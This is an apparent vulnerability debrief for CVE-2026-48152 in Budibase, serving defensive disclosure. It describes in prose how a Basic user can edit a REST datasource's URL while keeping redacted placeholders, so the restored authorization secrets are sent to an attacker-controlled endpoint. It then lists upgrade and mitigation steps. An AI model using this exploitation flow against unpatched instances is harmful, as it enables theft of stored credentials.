PatchSiren cyber security CVE debrief
CVE-2026-48152 Budibase CVE debrief
A privilege escalation vulnerability in Budibase prior to version 3.39.0 allows Basic app users to exfiltrate REST datasource authorization secrets. The issue stems from insufficient access controls on single-datasource GET and PUT endpoints, which rely on generic TABLE READ permissions rather than Builder/Admin-specific or datasource-ownership checks. The Basic role's WRITE permission set includes table read/write and query write capabilities, enabling unauthorized access to datasource configurations. When retrieving a datasource, authentication secrets are redacted with placeholder values. However, an attacker can submit a PUT request that modifies only the config.url field while preserving the redacted placeholders. The mergeConfigs() function restores the original stored secrets upon detecting these placeholders. During subsequent query execution, Budibase prepends the attacker-controlled URL to the saved relative query path and applies the resolved authorization headers, transmitting the secret to an attacker-controlled endpoint. This represents a server-side request forgery (SSRF) vector combined with secret disclosure. The vulnerability is classified as CWE-863 (Incorrect Authorization) and carries a CVSS 3.1 score of 8.1 (High severity).
- Vendor
- Budibase
- Product
- Unknown
- CVSS
- HIGH 8.1
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2026-05-27
- Original CVE updated
- 2026-05-27
- Advisory published
- 2026-05-27
- Advisory updated
- 2026-05-27
Who should care
Organizations operating Budibase instances with multi-user environments where Basic role users have application access. Security teams managing low-code platforms with REST datasource integrations. Compliance officers responsible for secrets management and access control auditing in citizen developer environments.
Technical summary
The vulnerability exists in Budibase's datasource management endpoints where GET and PUT operations on single datasources are protected only by generic TABLE READ permissions rather than role-specific or ownership-based access controls. The Basic app user role possesses WRITE permissions encompassing table read/write and query write operations. When a Basic user retrieves a REST datasource configuration, authentication secrets are redacted with placeholder strings. The user can then submit a modified configuration preserving these placeholders while changing the config.url value. The mergeConfigs() function incorrectly restores the original secrets when placeholder values are detected. Query execution combines the attacker-controlled base URL with existing relative paths and injects the restored authorization headers, enabling secret exfiltration to arbitrary endpoints. This vulnerability chain combines incorrect authorization (CWE-863) with server-side request forgery characteristics to achieve high-impact information disclosure.
Defensive priority
HIGH
Recommended defensive actions
- Upgrade Budibase to version 3.39.0 or later to remediate this vulnerability
- Review and restrict Basic user role assignments to minimize exposure
- Audit REST datasource configurations for unauthorized URL modifications
- Implement network egress controls to prevent unauthorized outbound requests from Budibase instances
- Monitor application logs for anomalous datasource configuration changes or unexpected query destinations
- Validate that datasource endpoint access controls enforce Builder/Admin ownership checks beyond generic TABLE READ permissions
Evidence notes
Vulnerability description sourced from official CVE record and NVD entry. Technical details regarding mergeConfigs() behavior, permission mappings, and exploitation flow derived from CVE description. Fix version 3.39.0 confirmed in advisory. CVSS vector and score from NVD source data.
Official resources
-
CVE-2026-48152 CVE record
CVE.org
-
CVE-2026-48152 NVD detail
NVD
-
Source item URL
nvd_modified
- Source reference
2026-05-27